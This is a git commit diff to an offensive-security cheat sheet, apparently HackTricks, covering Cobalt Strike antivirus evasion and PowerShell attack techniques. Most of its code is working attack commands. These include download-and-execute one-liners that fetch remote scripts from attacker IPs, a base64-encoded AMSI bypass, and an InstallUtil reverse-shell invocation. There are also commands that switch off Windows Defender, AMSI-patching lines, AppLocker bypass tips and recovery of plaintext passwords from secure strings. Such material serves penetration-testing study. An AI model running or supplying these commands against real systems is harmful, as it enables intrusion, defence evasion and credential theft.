GitBook: [#3407] No subject

This commit is contained in:
CPol 2022-08-18 23:30:34 +00:00 committed by gitbook-bot
parent dc36b843f4
commit a941c12d4f
No known key found for this signature in database
GPG key ID: 07D2180C7B12D0FF
3 changed files with 72 additions and 71 deletions

View file

@ -171,33 +171,3 @@ beacon> socks 1080
# SSH connection # SSH connection
beacon> ssh 10.10.17.12:22 username password</code></pre> beacon> ssh 10.10.17.12:22 username password</code></pre>
## Avoiding AVs
### Artifact Kit
Usually in `/opt/cobaltstrike/artifact-kit` you can find the code and pre-compiled templates (in `/src-common`) of the payloads that cobalt strike is going to use to generate the binary beacons.
Using [ThreatCheck](https://github.com/rasta-mouse/ThreatCheck) with the generated backdoor (or just with the compiled template) you can find what is making defender trigger. It's usually a string. Therefore you can just modify the code that is generating the backdoor so that string doesn't appear in the final binary.
After modifying the code just run `./build.sh` from the same directory and copy the `dist-pipe/` folder into the Windows client in `C:\Tools\cobaltstrike\ArtifactKit`.
```
pscp -r root@kali:/opt/cobaltstrike/artifact-kit/dist-pipe .
```
Don't forget to load the aggressive script `dist-pipe\artifact.cna` to indicate Cobalt Strike to use the resources from disk that we want and not the ones loaded.
### Resource Kit
The ResourceKit folder contains the templates for Cobalt Strike's script-based payloads including PowerShell, VBA and HTA.
Using [ThreatCheck](https://github.com/rasta-mouse/ThreatCheck) with the templates you can find what is defender (AMSI in this case) not liking and modify it:
```
.\ThreatCheck.exe -e AMSI -f .\cobaltstrike\ResourceKit\template.x64.ps1
```
Modifying the detected lines one can generate a template that won't be caught.
Don't forget to load the aggressive script `ResourceKit\resources.cna` to indicate Cobalt Strike to luse the resources from disk that we want and not the ones loaded.

View file

@ -18,14 +18,14 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
## Default PowerShell locations ## Default PowerShell locations
``` ```powershell
C:\windows\syswow64\windowspowershell\v1.0\powershell C:\windows\syswow64\windowspowershell\v1.0\powershell
C:\Windows\System32\WindowsPowerShell\v1.0\powershell C:\Windows\System32\WindowsPowerShell\v1.0\powershell
``` ```
## Basic PS commands to start ## Basic PS commands to start
```bash ```powershell
Get-Help * #List everything loaded Get-Help * #List everything loaded
Get-Help process #List everything containing "process" Get-Help process #List everything containing "process"
Get-Help Get-Item -Full #Get full helpabout a topic Get-Help Get-Item -Full #Get full helpabout a topic
@ -36,7 +36,7 @@ Get-Command -Module <modulename>
## Download & Execute ## Download & Execute
```bash ```powershell
powershell "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.9:8000/ipw.ps1')" powershell "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.9:8000/ipw.ps1')"
echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.13:8000/PowerUp.ps1') | powershell -noprofile - #From cmd download and execute echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.13:8000/PowerUp.ps1') | powershell -noprofile - #From cmd download and execute
powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://10.2.0.5/shell.ps1')|iex" powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://10.2.0.5/shell.ps1')|iex"
@ -48,13 +48,13 @@ $wr = [System.NET.WebRequest]::Create("http://10.10.14.9:8000/ipw.ps1") $r = $wr
### Download & Execute in background with AMSI Bypass ### Download & Execute in background with AMSI Bypass
```bash ```powershell
Start-Process -NoNewWindow powershell "-nop -Windowstyle hidden -ep bypass -enc JABhACAAPQAgACcAUwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAJwA7ACQAYgAgAD0AIAAnAG0AcwAnADsAJAB1ACAAPQAgACcAVQB0AGkAbABzACcACgAkAGEAcwBzAGUAbQBiAGwAeQAgAD0AIABbAFIAZQBmAF0ALgBBAHMAcwBlAG0AYgBsAHkALgBHAGUAdABUAHkAcABlACgAKAAnAHsAMAB9AHsAMQB9AGkAewAyAH0AJwAgAC0AZgAgACQAYQAsACQAYgAsACQAdQApACkAOwAKACQAZgBpAGUAbABkACAAPQAgACQAYQBzAHMAZQBtAGIAbAB5AC4ARwBlAHQARgBpAGUAbABkACgAKAAnAGEAewAwAH0AaQBJAG4AaQB0AEYAYQBpAGwAZQBkACcAIAAtAGYAIAAkAGIAKQAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkAOwAKACQAZgBpAGUAbABkAC4AUwBlAHQAVgBhAGwAdQBlACgAJABuAHUAbABsACwAJAB0AHIAdQBlACkAOwAKAEkARQBYACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMQAwAC4AMQAxAC8AaQBwAHMALgBwAHMAMQAnACkACgA=" Start-Process -NoNewWindow powershell "-nop -Windowstyle hidden -ep bypass -enc JABhACAAPQAgACcAUwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAJwA7ACQAYgAgAD0AIAAnAG0AcwAnADsAJAB1ACAAPQAgACcAVQB0AGkAbABzACcACgAkAGEAcwBzAGUAbQBiAGwAeQAgAD0AIABbAFIAZQBmAF0ALgBBAHMAcwBlAG0AYgBsAHkALgBHAGUAdABUAHkAcABlACgAKAAnAHsAMAB9AHsAMQB9AGkAewAyAH0AJwAgAC0AZgAgACQAYQAsACQAYgAsACQAdQApACkAOwAKACQAZgBpAGUAbABkACAAPQAgACQAYQBzAHMAZQBtAGIAbAB5AC4ARwBlAHQARgBpAGUAbABkACgAKAAnAGEAewAwAH0AaQBJAG4AaQB0AEYAYQBpAGwAZQBkACcAIAAtAGYAIAAkAGIAKQAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkAOwAKACQAZgBpAGUAbABkAC4AUwBlAHQAVgBhAGwAdQBlACgAJABuAHUAbABsACwAJAB0AHIAdQBlACkAOwAKAEkARQBYACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMQAwAC4AMQAxAC8AaQBwAHMALgBwAHMAMQAnACkACgA="
``` ```
### Using b64 from linux ### Using b64 from linux
```bash ```powershell
echo -n "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.31/shell.ps1')" | iconv -t UTF-16LE | base64 -w 0 echo -n "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.31/shell.ps1')" | iconv -t UTF-16LE | base64 -w 0
powershell -nop -enc <BASE64_ENCODED_PAYLOAD> powershell -nop -enc <BASE64_ENCODED_PAYLOAD>
``` ```
@ -63,25 +63,25 @@ powershell -nop -enc <BASE64_ENCODED_PAYLOAD>
### System.Net.WebClient ### System.Net.WebClient
``` ```powershell
(New-Object Net.WebClient).DownloadFile("http://10.10.14.2:80/taskkill.exe","C:\Windows\Temp\taskkill.exe") (New-Object Net.WebClient).DownloadFile("http://10.10.14.2:80/taskkill.exe","C:\Windows\Temp\taskkill.exe")
``` ```
### Invoke-WebRequest ### Invoke-WebRequest
``` ```powershell
Invoke-WebRequest "http://10.10.14.2:80/taskkill.exe" -OutFile "taskkill.exe" Invoke-WebRequest "http://10.10.14.2:80/taskkill.exe" -OutFile "taskkill.exe"
``` ```
### Wget ### Wget
``` ```powershell
wget "http://10.10.14.2/nc.bat.exe" -OutFile "C:\ProgramData\unifivideo\taskkill.exe" wget "http://10.10.14.2/nc.bat.exe" -OutFile "C:\ProgramData\unifivideo\taskkill.exe"
``` ```
### BitsTransfer ### BitsTransfer
``` ```powershell
Import-Module BitsTransfer Import-Module BitsTransfer
Start-BitsTransfer -Source $url -Destination $output Start-BitsTransfer -Source $url -Destination $output
# OR # OR
@ -90,7 +90,7 @@ Start-BitsTransfer -Source $url -Destination $output -Asynchronous
## Base64 Kali & EncodedCommand ## Base64 Kali & EncodedCommand
```bash ```powershell
kali> echo -n "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.9:8000/9002.ps1')" | iconv --to-code UTF-16LE | base64 -w0 kali> echo -n "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.9:8000/9002.ps1')" | iconv --to-code UTF-16LE | base64 -w0
PS> powershell -EncodedCommand <Base64> PS> powershell -EncodedCommand <Base64>
``` ```
@ -99,7 +99,7 @@ PS> powershell -EncodedCommand <Base64>
By default it is set to **restricted.** Main ways to bypass this policy: By default it is set to **restricted.** Main ways to bypass this policy:
``` ```powershell
1º Just copy and paste inside the interactive PS console 1º Just copy and paste inside the interactive PS console
2º Read en Exec 2º Read en Exec
Get-Content .runme.ps1 | PowerShell.exe -noprofile - Get-Content .runme.ps1 | PowerShell.exe -noprofile -
@ -123,19 +123,19 @@ More can be found [here](https://blog.netspi.com/15-ways-to-bypass-the-powershel
## Constrained language ## Constrained language
```bash ```powershell
$ExecutionContext.SessionState.LanguageMode $ExecutionContext.SessionState.LanguageMode
#Values could be: FullLanguage or ConstrainedLanguage #Values could be: FullLanguage or ConstrainedLanguage
``` ```
### Bypass ### Bypass
```bash ```powershell
#Easy bypass #Easy bypass
Powershell -version 2 Powershell -version 2
``` ```
In current Windows that Bypass won't work but you can use[ **PSByPassCLM**](https://github.com/padovah4ck/PSByPassCLM). **To compile it you may need** **to** _**Add a Reference**_ -> _Browse_ ->_Browse_ -> add _C:\Windows\Microsoft.NET\assembly\GAC\_MSIL\System.Management.Automation\v4.0\_3.0.0.0\\_\_31bf3856ad364e35\System.Management.Automation.dll\_ and **change the project to .Net4.5**. In current Windows that Bypass won't work but you can use[ **PSByPassCLM**](https://github.com/padovah4ck/PSByPassCLM). **To compile it you may need** **to** _**Add a Reference**_ -> _Browse_ ->_Browse_ -> add `C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0\31bf3856ad364e35\System.Management.Automation.dll` and **change the project to .Net4.5**.
#### Direct bypass: #### Direct bypass:
@ -149,11 +149,13 @@ C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogTo
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=true /revshell=true /rhost=10.10.13.206 /rport=443 /U c:\temp\psby.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=true /revshell=true /rhost=10.10.13.206 /rport=443 /U c:\temp\psby.exe
``` ```
You can use [**ReflectivePick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick) or [**SharpPick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick) to **execute Powershell** code in any process and bypass the constrained mode. For more info check: [https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-contstrained-language-mode](https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-contstrained-language-mode).
## AppLockerPolicy ## AppLockerPolicy
Check which files/extensions are blacklisted/whitelisted. Check which files/extensions are blacklisted/whitelisted.
``` ```powershell
Get-ApplockerPolicy -Effective -xml Get-ApplockerPolicy -Effective -xml
Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections
$a = Get-ApplockerPolicy -effective $a = Get-ApplockerPolicy -effective
@ -162,7 +164,7 @@ $a.rulecollections
## Enable WinRM (Remote PS) ## Enable WinRM (Remote PS)
```bash ```powershell
enable-psremoting -force #This enables winrm enable-psremoting -force #This enables winrm
# Change NetWorkConnection Category to Private # Change NetWorkConnection Category to Private
@ -178,15 +180,32 @@ Get-NetConnectionProfile |
## Disable Defender ## Disable Defender
```bash ```powershell
# Check status # Check status
Get-MpComputerStatus Get-MpComputerStatus
Get-MpPreference | select Exclusion* | fl #Check exclusions
# Disable # Disable
Set-MpPreference -DisableRealtimeMonitoring $true Set-MpPreference -DisableRealtimeMonitoring $true
#To completely disable Windows Defender on a computer, use the command: #To completely disable Windows Defender on a computer, use the command:
New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1 -PropertyType DWORD -Force New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1 -PropertyType DWORD -Force
# Set exclusion path # Set exclusion path
Add-MpPreference -ExclusionPath "C:\users\public\documents\magichk" Add-MpPreference -ExclusionPath "C:\users\public\documents\magichk"
Set-MpPreference -ExclusionPath "C:\users\public\documents\magichk"
# Check exclusions configured via GPO
Parse-PolFile .\Registry.pol
KeyName : Software\Policies\Microsoft\Windows Defender\Exclusions
ValueName : Exclusions_Paths
ValueType : REG_DWORD
ValueLength : 4
ValueData : 1
KeyName : Software\Policies\Microsoft\Windows Defender\Exclusions\Paths
ValueName : C:\Windows\Temp
ValueType : REG_SZ
ValueLength : 4
ValueData : 0
``` ```
### AMSI bypass ### AMSI bypass
@ -197,7 +216,7 @@ Therefore, the goal of the AMSI bypasses you will are are to **overwrite the ins
**AMSI bypass generator** web page: [**https://amsi.fail/**](https://amsi.fail/)**** **AMSI bypass generator** web page: [**https://amsi.fail/**](https://amsi.fail/)****
```bash ```powershell
# A Method # A Method
[Ref].Assembly.GetType('System.Management.Automation.Ams'+'iUtils').GetField('am'+'siInitFailed','NonPu'+'blic,Static').SetValue($null,$true) [Ref].Assembly.GetType('System.Management.Automation.Ams'+'iUtils').GetField('am'+'siInitFailed','NonPu'+'blic,Static').SetValue($null,$true)
@ -244,19 +263,19 @@ https://slaeryan.github.io/posts/falcon-zero-alpha.html
## PS-History ## PS-History
```bash ```powershell
Get-Content C:\Users\<USERNAME>\AppData\Roaming\Microsoft\Windows\Powershell\PSReadline\ConsoleHost_history.txt Get-Content C:\Users\<USERNAME>\AppData\Roaming\Microsoft\Windows\Powershell\PSReadline\ConsoleHost_history.txt
``` ```
## Get permissions ## Get permissions
```bash ```powershell
Get-Acl -Path "C:\Program Files\Vuln Services" | fl Get-Acl -Path "C:\Program Files\Vuln Services" | fl
``` ```
## OS version and HotFixes ## OS version and HotFixes
```bash ```powershell
[System.Environment]::OSVersion.Version #Current OS version [System.Environment]::OSVersion.Version #Current OS version
Get-WmiObject -query 'select * from win32_quickfixengineering' | foreach {$_.hotfixid} #List all patches Get-WmiObject -query 'select * from win32_quickfixengineering' | foreach {$_.hotfixid} #List all patches
Get-Hotfix -description "Security update" #List only "Security Update" patches Get-Hotfix -description "Security update" #List only "Security Update" patches
@ -264,20 +283,20 @@ Get-Hotfix -description "Security update" #List only "Security Update" patches
## Environment ## Environment
```bash ```powershell
Get-ChildItem Env: | ft Key,Value #get all values Get-ChildItem Env: | ft Key,Value #get all values
$env:UserName @Get UserName value $env:UserName @Get UserName value
``` ```
## Other connected drives ## Other connected drives
```bash ```powershell
Get-PSDrive | where {$_.Provider -like "Microsoft.PowerShell.Core\FileSystem"}| ft Name,Root Get-PSDrive | where {$_.Provider -like "Microsoft.PowerShell.Core\FileSystem"}| ft Name,Root
``` ```
### Recycle Bin ### Recycle Bin
```bash ```powershell
$shell = New-Object -com shell.application $shell = New-Object -com shell.application
$rb = $shell.Namespace(10) $rb = $shell.Namespace(10)
$rb.Items() $rb.Items()
@ -293,14 +312,14 @@ $rb.Items()
## Users ## Users
```bash ```powershell
Get-LocalUser | ft Name,Enabled,Description,LastLogon Get-LocalUser | ft Name,Enabled,Description,LastLogon
Get-ChildItem C:\Users -Force | select Name Get-ChildItem C:\Users -Force | select Name
``` ```
## Secure String to Plaintext ## Secure String to Plaintext
```bash ```powershell
$pass = "01000000d08c9ddf0115d1118c7a00c04fc297eb01000000e4a07bc7aaeade47925c42c8be5870730000000002000000000003660000c000000010000000d792a6f34a55235c22da98b0c041ce7b0000000004800000a00000001000000065d20f0b4ba5367e53498f0209a3319420000000d4769a161c2794e19fcefff3e9c763bb3a8790deebf51fc51062843b5d52e40214000000ac62dab09371dc4dbfd763fea92b9d5444748692" | convertto-securestring $pass = "01000000d08c9ddf0115d1118c7a00c04fc297eb01000000e4a07bc7aaeade47925c42c8be5870730000000002000000000003660000c000000010000000d792a6f34a55235c22da98b0c041ce7b0000000004800000a00000001000000065d20f0b4ba5367e53498f0209a3319420000000d4769a161c2794e19fcefff3e9c763bb3a8790deebf51fc51062843b5d52e40214000000ac62dab09371dc4dbfd763fea92b9d5444748692" | convertto-securestring
$user = "HTB\Tom" $user = "HTB\Tom"
$cred = New-Object System.management.Automation.PSCredential($user, $pass) $cred = New-Object System.management.Automation.PSCredential($user, $pass)
@ -314,7 +333,7 @@ Domain : HTB
Or directly parsing form XML: Or directly parsing form XML:
```bash ```powershell
$cred = Import-CliXml -Path cred.xml; $cred.GetNetworkCredential() | Format-List * $cred = Import-CliXml -Path cred.xml; $cred.GetNetworkCredential() | Format-List *
UserName : Tom UserName : Tom
@ -325,7 +344,7 @@ Domain : HTB
## SUDO ## SUDO
```bash ```powershell
#CREATE A CREDENTIAL OBJECT #CREATE A CREDENTIAL OBJECT
$pass = ConvertTo-SecureString '<PASSWORD>' -AsPlainText -Force $pass = ConvertTo-SecureString '<PASSWORD>' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential("<USERNAME>", $pass) $cred = New-Object System.Management.Automation.PSCredential("<USERNAME>", $pass)
@ -349,20 +368,20 @@ $computer = "<hostname>"
## Groups ## Groups
```bash ```powershell
Get-LocalGroup | ft Name #All groups Get-LocalGroup | ft Name #All groups
Get-LocalGroupMember Administrators | ft Name, PrincipalSource #Members of Administrators Get-LocalGroupMember Administrators | ft Name, PrincipalSource #Members of Administrators
``` ```
## Clipboard ## Clipboard
``` ```powershell
Get-Clipboard Get-Clipboard
``` ```
## Processes ## Processes
``` ```powershell
Get-Process | where {$_.ProcessName -notlike "svchost*"} | ft ProcessName, Id Get-Process | where {$_.ProcessName -notlike "svchost*"} | ft ProcessName, Id
``` ```
@ -374,7 +393,7 @@ Get-Service
## Password from secure string ## Password from secure string
```bash ```powershell
$pw=gc admin-pass.xml | convertto-securestring #Get the securestring from the file $pw=gc admin-pass.xml | convertto-securestring #Get the securestring from the file
$cred=new-object system.management.automation.pscredential("administrator", $pw) $cred=new-object system.management.automation.pscredential("administrator", $pw)
$cred.getnetworkcredential() | fl * #Get plaintext password $cred.getnetworkcredential() | fl * #Get plaintext password
@ -382,7 +401,7 @@ $cred.getnetworkcredential() | fl * #Get plaintext password
## Scheduled Tasks ## Scheduled Tasks
```bash ```powershell
Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State
``` ```
@ -390,14 +409,14 @@ Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,Tas
### Interfaces ### Interfaces
``` ```powershell
Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address
Get-DnsClientServerAddress -AddressFamily IPv4 | ft Get-DnsClientServerAddress -AddressFamily IPv4 | ft
``` ```
### Firewall ### Firewall
```bash ```powershell
Get-NetFirewallRule -Enabled True Get-NetFirewallRule -Enabled True
Get-NetFirewallRule -Direction Outbound -Enabled True -Action Block Get-NetFirewallRule -Direction Outbound -Enabled True -Action Block
@ -412,32 +431,32 @@ Get-NetFirewallRule -Direction Outbound -Enabled True -Action Block | Format-Tab
### Route ### Route
``` ```powershell
route print route print
``` ```
### ARP ### ARP
``` ```powershell
Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,LinkLayerAddress,State Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,LinkLayerAddress,State
``` ```
### Hosts ### Hosts
``` ```powershell
Get-Content C:\WINDOWS\System32\drivers\etc\hosts Get-Content C:\WINDOWS\System32\drivers\etc\hosts
``` ```
### Ping ### Ping
```bash ```powershell
$ping = New-Object System.Net.Networkinformation.Ping $ping = New-Object System.Net.Networkinformation.Ping
1..254 | % { $ping.send("10.9.15.$_") | select address, status } 1..254 | % { $ping.send("10.9.15.$_") | select address, status }
``` ```
### SNMP ### SNMP
``` ```powershell
Get-ChildItem -path HKLM:\SYSTEM\CurrentControlSet\Services\SNMP -Recurse Get-ChildItem -path HKLM:\SYSTEM\CurrentControlSet\Services\SNMP -Recurse
``` ```

View file

@ -362,13 +362,17 @@ Get-MpComputerStatus
Check which files/extensions are blacklisted/whitelisted. Check which files/extensions are blacklisted/whitelisted.
``` ```powershell
Get-ApplockerPolicy -Effective -xml Get-ApplockerPolicy -Effective -xml
Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections
$a = Get-ApplockerPolicy -effective $a = Get-ApplockerPolicy -effective
$a.rulecollections $a.rulecollections
``` ```
AppLocker rules applied to a host can also be read from the local registry at `HKLM\Software\Policies\Microsoft\Windows\SrpV2`.
**Useful Writable folders to bypass AppLocker Policy** **Useful Writable folders to bypass AppLocker Policy**
``` ```
@ -378,6 +382,14 @@ C:\Windows\Tasks
C:\windows\tracing C:\windows\tracing
``` ```
Commonly trusted [**"LOLBAS's"**](https://lolbas-project.github.io/) binaries can be also useful to bypass AppLocker.
**Poorly written rules could also be bypassed**, like `<FilePathCondition Path="%OSDRIVE%*\allowed*"/>`, you can create a folder called allowed anywhere and it will be allowed.
**DLL enforcement very rarely enabled** due to the additional load it can put on a system, and the amount of testing required to ensure nothing will break. So using DLLs as backdoors will help bypassing AppLocker.
You can use [**ReflectivePick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick) or [**SharpPick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick) to **execute Powershell** code in any process and bypass AppLocker. For more info check: [https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-contstrained-language-mode](https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-contstrained-language-mode).
### UAC ### UAC
UAC is used to allow an **administrator user to not give administrator privileges to each process executed**. This is **achieved using default** the **low privileged token** of the user.\ UAC is used to allow an **administrator user to not give administrator privileges to each process executed**. This is **achieved using default** the **low privileged token** of the user.\